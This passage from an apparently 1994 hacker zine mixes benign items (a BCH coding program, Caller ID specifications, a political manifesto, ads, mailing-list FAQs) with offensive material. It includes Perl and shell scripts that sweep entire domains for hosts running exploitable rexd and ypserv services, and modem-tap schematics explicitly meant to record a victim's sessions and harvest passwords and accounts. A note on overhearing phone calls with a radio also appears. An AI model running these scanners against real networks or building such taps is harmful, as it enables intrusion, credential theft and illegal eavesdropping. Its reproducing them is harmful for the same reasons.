>&2" } else print "unknown credit card" | "cat >&2" if (cclen == 13) bias = 0 else bias = 1 for (llen = 1; llen <= cclen; llen++) { cdigit = digit = substr(number, llen, 1) if (((llen-1+bias)%2) == 1) # double every second digit cdigit *= 2 if (cdigit > 9) cdigit -= 9 # compensate ... csum += cdigit # ... add up all the digits } if ((csum%10) != 0) print "bad CardNo" | "cat >&2" } ------------------------------------------------------------------------------ /* File: bch2.c ====== Encoder/Decoder of binary primitive BCH codes ====== Robert Morelos-Zaragoza, University of Hawaii 5/19/92 This program computes the generator polynomial of the code by using cycle sets modulo n, n = 2^m - 1. (Part of this program is adapted from a Reed-Solomon encoder/decoder program, 'rs.c', for the binary case. rs.c was created by Simon Rockliff, University of Adelaide 21/9/89) Main variables: m = order of the field GF(2**m) n = 2**m - 1 = length t = error correcting capability d = 2*t + 1 = designed minimum distance k = n - deg(g(x)) = dimension p[] = primitive polynomial to generate GF(2**m) (read from least to most significant coefficient) g[] = generator polynomial alpha_to [] = log table in GF(2**m) index_of[] = antilog table in GF(2**m) data[] = data polynomial bb[] = redundancy polynomial = x**(n-k) data[] modulo g[] numerr = number of errors errpos[] = error positions recd[] = received polynomial decerror = number of decoding errors ( in MESSAGE positions) */ #include #include int m, n, k, t, d ; int p [20] ; /* irreducible polynomial */ int alpha_to [1024], index_of [1024], g [1024] ; int recd [1024], data [1024], bb [1024] ; int numerr, errpos [1024], decerror = 0 ; int seed; void read_p() /* Read primitive polynomial of degree m */ { register int i; printf("Enter m and primitive polynomial p(x): "); scanf("%d", &m); for (i=0; i<=m; i++) scanf("%d", &p[i]); printf("p(x) = "); for (i=0; i<=m; i++) printf("%1d", p[i]); printf("\n"); n = (int)(pow(2.0,(double) m)) - 1; } void generate_gf() /* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m] lookup tables: index->polynomial form alpha_to[] contains j=alpha**i; polynomial form -> index form index_of[j=alpha**i] = i alpha=2 is the primitive element of GF(2**m) */ { register int i, mask ; mask = 1 ; alpha_to[m] = 0 ; for (i=0; i>= 1 ; for (i=m+1; i= mask) alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ; else alpha_to[i] = alpha_to[i-1]<<1 ; index_of[alpha_to[i]] = i ; } index_of[0] = -1 ; } void gen_poly() /* Compute generator polynomial of BCH code of length n=2^m - 1 */ { register int ii, jj, ll, kaux; int test, aux, nocycles, root, noterms, rdncy; int cycle[256][11], size[256], min[128], zeros[256]; /* Generate cycle sets modulo n, n = 2^m - 1 */ cycle[0][0] = 0; size[0] = 1; cycle[1][0] = 1; size[1] = 1; jj = 1; /* cycle set index */ printf("Computing cycle sets modulo %d ...\n", n); do { /* Generate the jj-th cycle set */ ii = 0; do { ii++; cycle[jj][ii] = (cycle[jj][ii-1]*2) % n; size[jj]++; aux = (cycle[jj][ii]*2) % n; } while ( aux != cycle[jj][0] ); printf(" %d ", jj); if (jj && ( (jj % 10) == 0)) printf("\n"); /* Next cycle set representative */ ll = 0; do { ll++; test = 0; for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle sets */ for (kaux=0; ((kaux " if $verbose; &resolve("$root.$i"); } # # Do the work # sub resolve { local($name) = @_; # ip address if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { ($a,$b,$c,$d) = split(/\./, $name); @ip = ($a,$b,$c,$d); ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); } else { ($name, $aliases, $type, $len, @ip) = gethostbyname($name); ($a,$b,$c,$d) = unpack('C4',$ip[0]); } if ($name && @ip) { print "$a.$b.$c.$d\t$name\n"; system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R unning ypserv.\"\nfi\nfi"); } else { print "unable to resolve address\n" if $verbose; } } sub AF_INET {2;} ------------------------------------------------------------------------------ #!/bin/sh #rpc.chk 1.0 # # Make sure you have got a newer version of Bourne Shell (SVR2 or newer) # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS) # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to # change the magic number, indicating the type of executable Bourne Shell. # # The script obtains via nslookup utility a list of hostnames from a nameserver # and checks every entry of the list for active rexd procedures as well as # ypserver procedures. The output is a list of the sites that run those # daemons and are insecure. # -yo. domainname=$1 umask 022 PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH # # Function collects a list of sites # from a nameserver. Make sure you've got the nslookup utility. # get_list() { ( echo set type=ns echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null if [ ! -s .tmp$$ ]; then echo "No such domain" >&2 echo "Nothing to scan" >&2 exit 1 fi for serv in `cat .tmp$$`;do ( echo server $serv echo ls $domainname ) | nslookup > .file$$ 2>/dev/null lines=`cat .file$$ | wc -l` tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file sed -e "s/$/.$domainname/" .file.tmp > .hosts$$ rm -rf .file* .tmp$$ sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$ done tr 'A-Z' 'a-z' HOSTS.$domainname;rm -rf HOSTS$$ } # Function rpc_calls() { for entry in `cat HOSTS.$domainname`; do ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error! ) >> .log 2>/dev/null ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error ! ) >> .log 2>/dev/null done } # Main if [ "$domainname" = '' ]; then echo "Usage $0 domainname" >&2 exit 1 fi get_list echo "Checking $domainname domain" > .log echo "*****************************" >> .log echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log echo "******************************" >> .log echo "started at `date`" >> .log echo "******************************" >> .log rpc_calls echo "******************************" >> .log echo "finished at `date`" >> .log ------------------------------------------------------------------------------ The Ultimate Finger/Mail Hack by Emanon (a.k.a. WinterHawk) This program will keep a log of who fingers you on your local host and tell you when the finger was performed. As an added tease, it will send email to the person doing the fingering telling them that you know who they are and you know when they fingered you, even when you are not logged on. Easy to follow steps: [This is a comment] [ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!] [Get to your home directory] % cd [Make a file called .mailscript and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat .mailscript #!bin/sh MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!! HOME=/your/full/home/path/goes/here SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'` echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER [On some systems, the `u' flag is not necessary for the `ps' command] [On most systems, you will not have to (re)declare the $HOME variable] [If you do not want the fingerer to receive email, remove the last line] [You may wish to hard code your account name, rather than using the variable] [Make a file called fingerLog.c and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat fingerLog.c #include #include main() { int x, pipeHandle, planHandle; char * pipeFile = "/your/full/home/path/goes/here/.plan"; char * planFile = "/your/full/home/path/goes/here/.realplan"; char buf[1024]; for(;;){ pipeHandle=open(pipeFile,O_WRONLY); planHandle=open(planFile,O_RDONLY); while((x=read(planHandle,buf,sizeof(buf)))>0) write(pipeHandle,buf,x); system("sh /your/full/home/path/goes/here/.mailscript"); close(pipeHandle); close(planHandle); sleep(3);} } [Compile the fingerLog.c program] % cc fingerLog.c -o fingerLog [You may want to use a more inconspicuous name for the executable file] [Move you .plan file to .realplan] % mv .plan .realplan [Make a piped FIFO .plan file] % mknod .plan p [Allow people to view your bogus .plan file] % chmod 755 .plan [Run fingerLog in the background] % nohup fingerLog > /dev/null & [Optional clean up] % rm fingerLog.c PROBLEMS: On some machines, the [ps -fau] option will not reveal what account a person is actually fingering. In this case, you can remove all instances of the $MYNAME variable from the [.mailscript] file. However, it is entirely possible that two people may be performing a finger at the same time and the script may log the wrong one. If you do have to omit the $MYNAME variable, I strongly suggest that you also remove the email option. And, you might as well change the [ps] command to a simple [w], like so: SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'` Also, if the system you are on is bogged down with a lot of processes, the script may not find the fingerer before the process is terminated, thus logging the time without an appropriate account name, and not sending the email. So far, there has only been one system where I could only use the program to log the times that I had been fingered, no account names and no email :( That's It! Of course, this is not a perfect bug free program. It should run all the time [even when you are not logged on] so you only need to run it once. If it does quit for some reason [like when the sysop kills it], you can simply restart it. For those of you privileged enough to be using Korn shell, you can add the following code to your [.profile] that will check to see if fingerLog is running whenever you log in. If it isn't, it will restart it for you. I'm sure that this can be modified to work with Bourne and C shell (if it doesn't already), but I'll leave that up to you. ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null if (( $? != 0 )); then nohup fingerLog > /dev/null & fi Let me say this one more time so that there is no confusion, "This only works on your LOCAL host!!!" People who finger you from a remote host will see your [.realplan] file, just like everyone else, but they will *NOT* receive the email. It will appear in your .fingerlog as an empty account name. If and when someone does revise this to work with remote hosts (most likely using the netstat command), please email me a copy at: tdavis@garnet.acns.fsu.edu As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes *ANY* revisions, please have the courtesy to email me a copy and explain what changes you have made. Thanks. Enjoy! Assembly: WinterHawk bows humbly to Cat and Fuzz. ------------------------------------------------------------------------------ +----------------------+ | Building A Modem Tap | | by: phigan | +----------------------+ Many of you have probably heard of, seen, or maybe even built a phone tap. Not a very difficult device to make. I got the idea of making a modem tap from a computer underground book that I saw over at my local Spy Headquarters (I'm not sure if this is a store that is only here in 602 or not but its got shitloads of spy equipment such as video surveillance, fake ids, useful literature, fake bombs, very small bugs, etc.). First of all, here is the schematic for making a phone tap to record to cassette. Parts ~~~~~ 1) RCA-type jack to tape recorder mic input 1) 10k(p)ohm : 20k(s) ohm transformer 1) .005 mfd capacitor Schematic ~~~~~~~~~ To line +--------------------------+ | | | | | | (+-----------+ | | | RCA | Transformer | | | jack +^^^^^^^^^^^^^+ | | +-------------+ | | | | | | | +----------------+ | | | +----------||------------+ | .005 mfd | | The main purpose for a modem tap such as this is to set it up at someone's house or maybe an office building that you know dials out with modems and you can record all the keystrokes that have been entered. With this next schematic, you can simply play the cassette back through your modem and easily print out the entire session having logged passwords and so on. Good way of getting CBI accounts also. Parts ~~~~~ 1) RCA type jack from tape recorder ext. speaker 1) 100 Ohm restistor 1) bell-type phone jack (@) Schematic ~~~~~~~~~ +-------+ ____________________ RCA jack ----| Modem | @----<_________/\/\/\_____>(+ +-------+ phone 100 Ohm jack When you have a recording of your victim's session, simply fire up your terminal program and treat it as you would any other modem connection. If you are smart enough, you may even be able to combine these two and make an acoustic modem module for a regular laptop modem (hint hint payphones hint hint). I have seen this done in a mail-order mag. It said that the acoustic module could handle 9600 baud and if you have good enough rubber cups (like they did on their model) then you will have absolutely no line noise. Anyway, if you have any problems, feel free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC as phigan on channels #phreak, #hack, or sometimes #c-64. ,,, (o o) .---------------oOO---(_)---OOo---------------. | PHiGAN/6o2 IBM/Amiga/8-Bit | | ANSi/VGA/Coding Member: NWPAC | | Hi-Res/8-Bit/Musix SysOp: | | 15660@ef.gc.maricopa.edu -The PhAcS Machine | `---------------------------------------------' ------------------------------------------------------------------------------ Phone Tapping with a personal stereo !!! brought to you by Harlequin Here in the UK, we have a reasonably secure phone system, mainly because the whole system is run by our beloved phone company British Telecom, even the private phone companies have to rent their lines off BT. BUT, due to something or other I don't entirely understand here's how to listen in to phone conversations with a personal stereo. I was lying in bed one night trying desperately to read my book, while everyone else was making enough noise to wake the dead. So, I thought, I'll put personal stereo radio onto some radio crackle to cut out everything else. I was happily reading for a while when suddenly the radio crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone conversation. After a bit of investigating I discovered my bed lies next to where the telephone line goes thru the wall. What I did was to tune the radio into an AM frequency, as far to the right (past 1600 kHz) as possible. This works on my personal stereo, a Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not on some other radios we've tried. It picks up local telephone calls (if there are any strong enough to be picked up) when the radio is put near a telephone socket or line (the closer the better). Computer monitors and TV's give loads of interference (try putting your the radio near one when tuned to listen for phones) so keep away from them. You can't choose what calls to listen in on, and some may be blurred beyond recognition, while others are crystal clear. Also, strangely enough if someone in the house uses the phone while your listening to conversations it doesn't effect it in any way, and you can't hear the call currently on the line. Not being an electronics hacker I can only assume it is to do with the frequency of radio waves given off by electrical devices after a certain distance travelled. But then again maybe not. This may work in other places apart from the UK as well, give it a try ! From phrack@well.sf.ca.us Thu Mar 31 23:51:12 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA19094; Thu, 31 Mar 94 23:50:42 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA17126; Wed, 30 Mar 1994 22:57:02 -0800 Date: Wed, 30 Mar 1994 22:57:02 -0800 From: Chris Goggans Message-Id: <199403310657.WAA17126@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-06 Status: OR ==Phrack Magazine== Volume Five, Issue Forty-Five, File 6 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART III ------------------------------------------------------------------------------ ** SUBMISSIONS WANTED ON THE FOLLOWING TOPICS FOR FUTURE ISSUES ** Cable Television Descrambling PBX Data Terminal Files Van Eck Eavesdroping Security & Anti-Security Measures (Computers, Networks, Physical Sites) Satellite Transmissions (Audio, Video, DATA, Telecommunications) Amateur Radio & Television Radio Modification Instructions Electronics Project Schematics X.25 Networking / X.29 Pad Control Digital Cellular (GSM/TDMA/CDMA) Wireless Data Networking (LAN, WAN) ** REMEMBER: Send your university dialups to phrack@well.com ASAP! ** ------------------------------------------------------------------------------ A Declaration of the Complaints and Grievances of the United States Electronic Community -- "They that can give up essential liberty for a little temporary safety deserve neither liberty nor safety!" These are Benjamin Franklin's words for one of the most important values defining American Government in it's infancy. This idea, that people should be given as much freedom as possible, and also responsibility for what problems abuse of that freedom might bring, is one of the most important differences between our so called "Democracy," and a totalitarian despotism. In fact, this value is so essential that if it is lost there will be no freedom in the United States of America, and no so called "Democracy!" Despite this fact, every day more and more of our freedoms, as citizens and residents of the United States of America, are being eroded away in the name of safety for us and for our government. This erosion of rights and freedoms has touched all areas of our lives, from health care and economics, to criminal justice and national defense. However, the most profound and dangerous erosion has been in the area of technology. We believe this is as good a place as any to begin a fight to save our country from continuing to travel down the road to despotism. Do not forget that this is only a beginning. We, the people of the Electronic Community in the United States of America, have been openly repressed and attacked by all branches and divisions of the United States Government, in direct violation of our natural rights and rights granted to us via social contract! The Electronic Community is one of the world's greatest examples of the power of freedom and democracy. Most of Cyberspace was not created by businesses looking for profit, or by governments looking for more efficient control, but mainly by ordinary citizens looking for a medium through which they could communicate with others, and express their thoughts and ideas. The computerized telecommunications used by the electronic community is a medium unlike any that has ever existed. It is a decentralized, mostly uncensored, and public forum for open discussion on a world wide basis. It provides ordinary citizens with the ability to express their ideas to anyone willing to listen, with no economic or social barriers and no prejudgments. It gives everyone in the world access to all the knowledge and information the world has to offer. It has continually shattered deeply ingrained social prejudices concerning characteristics such as age, race, wealth, and sex. In fact, it is common to find 14 year olds arguing philosophy with 41 year olds on America's computer networks! However, instead of embracing this great tool of freedom, the United States Government has reacted to it with fear and ignorance. They have completely ignored the positive effects the existence of this resource is already having on society. In fact, they have done little, if anything, to even gain an understanding of the electronic community and it's citizens. They have thought only of the damage that could be wrought if access to this kind of knowledge and information fell into the "wrong hands." They have labeled everyone in the electronic community a potential criminal, and have cracked down on any kind of activity which has not met their standards. In doing so they have crushed the free flow of ideas, trampled on the constitution, and blatantly encroached upon the civil rights of the people living and working on American's computer networks. They have chosen safety above freedom, and in doing so they have threatened the existence of one of the most important social developments of the twentieth century... They have ensued upon a Campaign of Terror, using fear to control and oppress the Electronic Community. They have openly and blatantly violated local, state, and federal law, and internationally accepted standards for human rights. They have used misinformation to set certain areas of the electronic community off against one another, or to label certain areas as criminal, while they have attacked the entire community without regard to action or position. They have lied to the press, to themselves, and to the American people in order to keep their actions unquestioned. They have imposed taxes and tariffs and have priced public utilities with the specific intent of effecting a chill upon the free flow of thoughts and ideas. They have used technology to amass enormous amounts of information on innocent citizens in order to control and oppress them. They have judged the interests of private industry to be more important than the interests of the general population. They have attacked innocent citizens in order to increase the profits of certain industries. They have declared themselves immune from the legal and moral standards they expect from the rest of society. They have, on a regular basis, committed the very acts they have called criminal. They have tried to criminalize personal privacy while belligerently defending the privacy of businesses and of government. They have attempted to control the minds of the American people by criminalizing certain knowledge and information. They have prevented the preparation of thoughts and ideas for public dissemination. They have threatened innocent citizens with loss of their right to life, liberty, property, and the pursuit of happiness in order to control their thoughts, opinions, and actions. They have repeatedly made laws and taken legal action in areas and/or concerning subjects of which they have little or no understanding. They have seized, damaged, and destroyed the property of innocent citizens. They have wrongly imprisoned citizens based on questionable information for actions which are negligible and, at worst, legally gray. They have directly attacked innocent citizens in order to keep them from publicly assembling. They have spied on and attempted to interfere with the private communications of innocent citizens. They have made unreasonable and excessive searches and seizures. They have punished innocent citizens without trial. They have attempted to effect a chill on the free flow of thoughts and ideas. They have affected to render the government independent of and superior to the people. We cannot, we WILL not, allow this tyranny to continue! The United States Government has ignored the voice of the Electronic Community long enough! When we told the government that what they were doing was wrong, they refused to listen! When we formed political action groups to bring our cases to court and before Congress, we were told that we were using loopholes in the law to get away with crime!!! We have, in a peaceful and respectful manner, given our government more than reasonable petition for redress of our grievances, but if anything the situation has gotten worse! Government administrations use computer crime as a weapon in internal battles over jurisdiction. Government officials, who have only the slightest understanding of computer science, use computer crime as a tool for career success. Elected Representatives, who have absolutely no understanding of computers, use "information superhighways", computer crime, and cryptography to gain constituent money and voter support! The Electronic Community, the only group who fully understands the issues involved here, and the only group who is effected by the decisions being made, has been completely ignored! We have sat around and discussed these wrongs long enough! NOW IS THE TIME TO STAND UP AND DEMAND A REDRESS OF OUR GRIEVANCES BY ANY AND ALL MEANS AVAILABLE! We must scream the truth so loudly that we drown out everything else! We must save our small community from destruction so that when the rest of society is ready, the world will still have a forum for free speech and open communication. We must demand freedom for America's Electronic Community!!! Tom Cross AKA The White Ninja TWN615@Phantom.Com NOTE: Redistribution and further publishing of this document is highly encouraged as long as proper credit is given. ------------------------- ------------------------- "Government is not a reason, not an eloquence; ------------------------- it is a force. Like fire, it is a dangerous --------------- * * * * * servant and a fearful master." --------------- * * * * * --------------- * * * * * -- George Washington --------------- * * * * * ------------------------------------------------------------------------------ THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly ======================================================================== ISSN 1074-3111 Technology, Conspiracy, Editorials, Politics, Networking ======================================================================== Editor-in-Chief: Scott Davis NetSurfer: John Logan It's A Conspiracy!: Gordon Fagan E-Mail - editors@fennec.com ** ftp site: etext.archive.umich.edu /pub/Zines/JAUC U.S. Mail: The Journal Of American Underground Computing 10111 N. Lamar #25 Austin, Texas 78753 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% To Subscribe to "TJOAUC", send mail to: sub@fennec.com All questions/comments about this publication to: comments@fennec.com Send all articles/info that you want published to: submit@fennec.com Commercial Registration for Profitable Media: form1@fennec.com "The underground press serves as the only effective counter to a growing power, and more sophisticated techniques used by establishment mass media to falsify, misrepresent, misquote, rule out of consideration as a priori ridiculous, or simply ignore and blot out of existence: data, books, discoveries that they consider prejudicial to establishment interest..." (William S. Burroughs and Daniel Odier, "The Job", Viking, New York, 1989) ------------------------------------------------------------------------------ New TimeWasters T-shirts ! Do you know the feeling ? You're behind your terminal for hours, browsing the directories of your school's UNIX system. Instead of holes, bugs and bad file permissions you find tripwire, TCPwrapper and s/key. You run a file with a s-bit and immediately you get a mail from the system admin asking what you are doing. In other words, no chance to ever become a good hacker there. Now you have the chance to at least pretend to be an eleet hacker. The Dutch hacking fanatics The TimeWasters have released the third version of their cool 'hacker' T-shirt. Because the previous versions were too limited (20 and 25 shirts) we printed no less than 200 shirts this time. Of course you want to know, what does it look like ? On the front, a TimeWasters logo in color. Below that a picture of two hacking dudes, hanging behind their equipment, also featuring a stack of phracks, pizza boxes, beer, kodez, and various computer-related stuff with a 'No WsWietse' sticker. On the back, the original TimeWasters logo with the broken clock. Below it, four original and dead funny real quotes featuring the art of Time Wasting. Wearing this shirt can only provoke one reaction; WOW ! Imagine going up to the helpdesk wearing this shirt and keeping a straight face while asking a security question ! And for just $2 more you'll get a pair of sunglasses with the text 'TimeWasters' on them ! To order: Send $20 or $22 to TimeWasters Postbus 402 5611 AK Eindhoven The Netherlands, Europe This includes shipping. Please allow some time for delivery. If you are in Holland, don't send US$, email the address below for the price in guilders and our 'postbank' number. For more information: email to: - timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile with more info. - rob@hacktic.nl or gigawalt@win.tue.nl for questions. Written by Rob J. Nauta, rob@hacktic.nl dd. 8 mar 1994 ------------------------------------------------------------------------------ Caller ID Technical Details by Hyperborean Menace The way Caller ID works internally is through SS7 (Signalling System 7) messages between telephone switches equipped to handle SS7. These messages pass all the call information (block/no block, calling number, etc.). The calling number is sent as part of the SS7 call setup data on all SS7 routed calls (i.e. all calls carried between switches that are SS7 connected). The calling number is sent between switches always, regardless of whether or not *67 (Caller ID Block) is dialed. It just sends along a privacy indicator if you dial *67, and then the final switch in the path will send a "P" instead of the calling number to the Caller ID box. (But it will still store the actual number - *69 will work whether or not the caller dialed *67). What the final switch along the path does with the calling number depends on how the switch is configured. If you are not paying for Caller ID service, the switch is configured so that it will not transmit the Caller ID data. This is entirely separate from Automatic Number Identification, which is sent along SS7 where SS7 is available, but can also be sent using other methods, so that ALL switches (for many years now) have been able to send ANI (which is what Long Distance companies used to know who to bill). Enhanced 911 is NOT based on Caller ID, but on ANI, thus, it will work for anyone, not just people connected to SS7 capable switches. And, of course, *67 will have no effect on Enhanced 911 either. Also interesting is the effect call forwarding has on the various services. Say I have my home telephone forwarded to Lunatic Labs, and it has Caller ID. If you call me, the call will forward to Lunatic Labs, and its Caller ID box will show YOUR number, not mine (since your line is the actual one making the call). However, ANI is based on the Billing Number (who is paying for the call (or would pay if it weren't free), not on who is actually making the call. Thus, if I forward my telephone to an 800 Number that gets ANI (such as the cable pay-per-view order number), and you call me, they will get MY number (since I would be the one paying for that portion of the call, except that 800 Numbers are free), and you will end up ordering pay-per-view for me... CNID (Caller ID) Technical Specifications PARAMETERS The data signalling interface has the following characteristics: Link Type: 2-wire, simplex Transmission Scheme: Analog, phase-coherent FSK Logical 1 (mark) 1200 +/- 12 Hz Logical 0 (space) 2200 +/- 22 Hz Transmission Rate: 1200 bps Transmission Level: 13.5 +/- dBm into 900 ohm load (I have copied this data as presented. I believe the transmission level is meant to be -13.5 dBm.) [It is indeed -13.5 dBm] PROTOCOL The protocol uses 8-bit data words (bytes), each bounded by a start bit and a stop bit. The CND message uses the Single Data Message format shown below. [ I belive this is the same as standard asynchronous serial - I think the start bit is a "space", and the stop bit is a "mark" ] Channel Carrier Message Message Data Checksum Seizure Signal Type Length Word(s) Word Signal Word Word CHANNEL SEIZURE SIGNAL The channel seizure is 30 continuous bytes of 55h (01010101) providing a detectable alternating function to the CPE (i.e. the modem data pump). [CPE = Customer Premises Equipment --i.e. your Caller ID Box] CARRIER SIGNAL The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to condition the receiver for data. MESSAGE TYPE WORD The message type word indicates the service and capability associated with the data message. The message type word for CND is 04h (00000100). MESSAGE LENGTH WORD The message length word specifies the total number of data words to follow. DATA WORDS The data words are encoded in ASCII and represent the following information: o The first two words represent the month o The next two words represent the day of the month o The next two words represent the hour in local military time o The next two words represent the minute after the hour o The calling party's directory number is represented by the remaining words in the data word field If the calling party's directory number is not available to the terminating central office, the data word field contains an ASCII "O". If the calling party invokes the privacy capability, the data word field contains an ASCII "P". [ Note that 'O' will generally result in the Caller-ID box displaying "Out Of Area" indicating that somewhere along the path the call took from its source to its destination, there was a connection that did not pass the Caller ID data. Generally, anything out of Southwestern Bell's area will certainly generate a 'O', and some areas in SWB territory might also not have the SS7 connections required for Caller ID] CHECKSUM WORD The Checksum Word contains the twos complement of the modulo 256 sum of the other words in the data message (i.e., message type, message length, and data words). The receiving equipment may calculate the modulo 256 sum of the received words and add this sum to the received checksum word. A result of zero generally indicates that the message was correctly received. Message retransmission is not supported. EXAMPLE CND SINGLE DATA MESSAGE An example of a received CND message, beginning with the message type word, follows: 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51 04h= Calling number delivery information code (message type word) 12h= 18 decimal; Number of data words (date, time, and directory number words) ASCII 30,39= 09; September ASCII 33,30= 30; 30th day ASCII 31,32= 12; 12:00 PM ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM) ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling party's directory number 51h= Checksum Word [ There is also a Caller Name service that will transmit the number and the name of the caller. The basic specs are the same as just numbers, but more data is transmitted. I don't have the details of the data stream for that.] DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS To receive CND information, the modem monitors the phone line between the first and second ring bursts without causing the DAA to go off hook in the conventional sense, which would inhibit the transmission of CND by the local central office. A simple modification to an existing DAA circuit easily accomplishes the task. [i.e. The Caller-ID Device should present a high impedance to the line] MODEM REQUIREMENTS Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. According to Bellcore specifications, CND signalling starts as early as 300 mS after the first ring burst and ends at least 475 mS before the second ring burst. ------------------------------------------------------------------------------ Country Percentage of Piracy -------------------------------------------------------- Australia / New Zealand 45% Benelux 66 France 73 Germany 62 Italy 86 Japan 92 Korea 82 Singapore 41 Spain 86 Sweden 60 Taiwan ( 1990 ) 93 Thailand 99 United Kingdom 54 United States 35 Source: Business Software Alliance, based on 1992 h/w & s/w shipping figures ------------------------------------------------------------------------------ The Frog Farm Mailing List FAQ v1.1 January 20th, 1994 1. What is this I am reading? 2. What is the Frog Farm? 3. Okay, so what's the Frog Farm mailing list? 4. Are there any rules enforced on the mailing list? 5. I can see all the addresses of the subscribers! 6. You must be Nazis. After all, aren't people who hate Jews, blacks, etc., the only people who talk about this sort of thing? 1. What is this I am reading? This is the FAQ for the Frog Farm mailing list. It is NOT the FAQ for the Frog Farm. The FAQ for the Frog Farm is much larger (just over 100 Kbytes in size). 2. What is the Frog Farm? Read the FAQ. You can FTP it from etext.archive.umich.edu in the /pub/Legal/FrogFarm directory (also accessible via Gopher). If you do not have FTP access, you may request the FAQ via e-mail from schirado@lab.cc.wmich.edu. 3. Okay, so what's the Frog Farm mailing list? frog-farm@blizzard.lcs.mit.edu is an unmoderated e-mail forum devoted to the discussion of claiming, exercising and defending Rights in America, past, present and future. Topics include, but are not limited to, conflicts which can arise between a free people and their public servants when said servants exceed the scope of their powers, and possible methods of dealing with such conflicts. To subscribe to the list, send a message containing the single line: ADD to frog-farm-request@blizzard.lcs.mit.edu. To remove your subscription from the forum, send a message containing the single line: REMOVE to frog-farm-request@blizzard.lcs.mit.edu. Note that these commands must be in the BODY of the message; the contents of the Subject line are ignored. While you are subscribed, send mail to frog-farm@blizzard.lcs.mit.edu to echo your message to all other list subscribers. 4. Are there any rules enforced on the mailing list? Only two: 1) Do not reveal the e-mail addresses of any subscribers to any individuals who are not subscribers. You may freely redistribute any article posted to the Frog Farm, subject to whatever conditions the poster may have placed on it. For example, some people attach a notice to their message stating that they are NOT allowing the redistribution of their message under ANY circumstances, some people stipulate that it may be redistributed only if it is unaltered in any way, etc. 2) No flaming is permitted. The list maintainers are the sole judges of what constitutes flaming. 5. I can see all the addresses of the subscribers! Under normal circumstances, you can't see the names. If you can, you had to work at it; if so, you obviously know what you're doing, and you should have known better. Try not to let your curiosity overwhelm your respect for the privacy of others. The security on this list is not as tight as it could be, and it is a trivial process for a knowledgeable hacker or hackers to circumvent it. If you know how to do this, please don't do it. 6. You must be Nazis. After all, aren't people who hate Jews, blacks, etc., the only people who talk about this sort of thing? Not at all. The official position of the Frog Farm is that every human being, of any sex or race, has "certain inalienable Rights" which may not be violated for any cause or reason. Anyone may claim and exercise Rights in America, providing they possess the necessary courage and mental competence. The Frog Farm provides a List of Interesting Organizations to its subscribers, which may include organizations or persons who believe in a god or gods, or promote the idea that certain races are inferior or perhaps part of a conspiratorial plot to enslave everyone else. The list maintainers make every effort to note such idiotic beliefs, where they exist, and encourage people not to throw out the baby with the bathwater, but to seek the truth wherever it may be found. Every individual is unique, and none may be judged by anything other than their words and actions. ------------------------------------------------------------------------------ The LOD Communications Underground H/P BBS Message Base Project: Information/Order File: Brief Version 2/17/94 This is a short version of the longer, 35K (12 page) Order/Info file. If you want the full file, sample message file, detailed tables of contents file, etc. you can request it from lodcom@mindvox.phantom.com or choose menu item #5 on the Mindvox Gopher Server by using any gopher and opening a connection with the hostname: mindvox. The Project: ------------ Throughout history, physical objects have been preserved for posterity for the benefit of the next generation of humans. Cyberspace, however, isn't very physical; data contained on floppy diskettes has a finite lifetime as does the technology to 